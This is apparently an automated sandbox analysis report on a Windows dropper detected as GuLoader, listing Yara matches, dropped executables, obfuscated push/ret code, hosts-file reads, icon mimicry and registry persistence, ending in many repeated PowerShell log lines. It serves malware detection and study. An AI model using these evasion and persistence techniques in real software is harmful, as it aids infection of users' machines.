Source: Yara match	File source: 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.348826366.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.285408477.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.361096693.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.310907115.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCXCD96.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, type: DROPPED

Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENS

Jump to behavior

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static file information: File size 1490944 > 1048576

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x136600

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00446564 push 004465F1h; ret	6_2_004465E9
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00406B3C push 00406B8Dh; ret	6_2_00406B85
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00478CB0 push 00478D2Dh; ret	6_2_00478D25
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00422044 push ecx; mov dword ptr [esp], edx	6_2_00422049
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042E010 push 0042E03Ch; ret	6_2_0042E034
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0046C0B0 push ecx; mov dword ptr [esp], eax	6_2_0046C0B2
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004761F8 push 0047623Bh; ret	6_2_00476233
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0049419C push 004941CFh; ret	6_2_004941C7
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042E1BC push 0042E1E8h; ret	6_2_0042E1E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00480210 push 0048023Ch; ret	6_2_00480234
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004842DC push 00484308h; ret	6_2_00484300
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048036C push 00480398h; ret	6_2_00480390
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042C3D0 push 0042C3FCh; ret	6_2_0042C3F4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00432468 push 004324B4h; ret	6_2_004324AC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00486408 push 004864ADh; ret	6_2_004864A5
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0047C404 push 0047C430h; ret	6_2_0047C428
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00432404 push 00432447h; ret	6_2_0043243F
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004324C0 push 0043250Bh; ret	6_2_00432503
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042C4C4 push 0042C4F0h; ret	6_2_0042C4E8
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004464FC push 00446562h; ret	6_2_0044655A
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00490554 push 00490580h; ret	6_2_00490578
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0047A514 push 0047A540h; ret	6_2_0047A538
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00432518 push 00432544h; ret	6_2_0043253C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00496530 push 00496586h; ret	6_2_0049657E
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048859C push 004885DEh; ret	6_2_004885D6
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00432650 push 004326C6h; ret	6_2_004326BE
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0049A6BC push 0049A745h; ret	6_2_0049A73D
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00480744 push 00480770h; ret	6_2_00480768
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0049A750 push 0049A776h; ret	6_2_0049A76E
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048077C push 004807A8h; ret	6_2_004807A0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048477C push 004847A8h; ret	6_2_004847A0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,

6_2_004730FC

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1

Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\ProgramData\Synaptics\RCXCD96.tmp			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1

Jump to dropped file

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\Users\user\Desktop\._cache_uniformerede.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	File created: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	File created: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\ProgramData\Synaptics\RCXCD96.tmp	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (31).png

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	6_2_00459934
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	6_2_0045A054
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	6_2_0045A104
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,	6_2_0042C6FC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0044083C IsIconic,GetCapture,	6_2_0044083C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	6_2_0045695C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	6_2_004410F0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	6_2_00441A14
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	9_2_00459934
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	9_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	9_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,	9_2_0042C6FC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0044083C IsIconic,GetCapture,	9_2_0044083C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	9_2_0045695C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	9_2_004410F0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	9_2_00441A14
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	12_2_00459934
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	12_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	12_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,	12_2_0042C6FC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0044083C IsIconic,GetCapture,	12_2_0044083C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	12_2_0045695C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	12_2_004410F0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	12_2_00441A14

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

6_2_0042E3B4

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\ProgramData\Synaptics\Synaptics.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
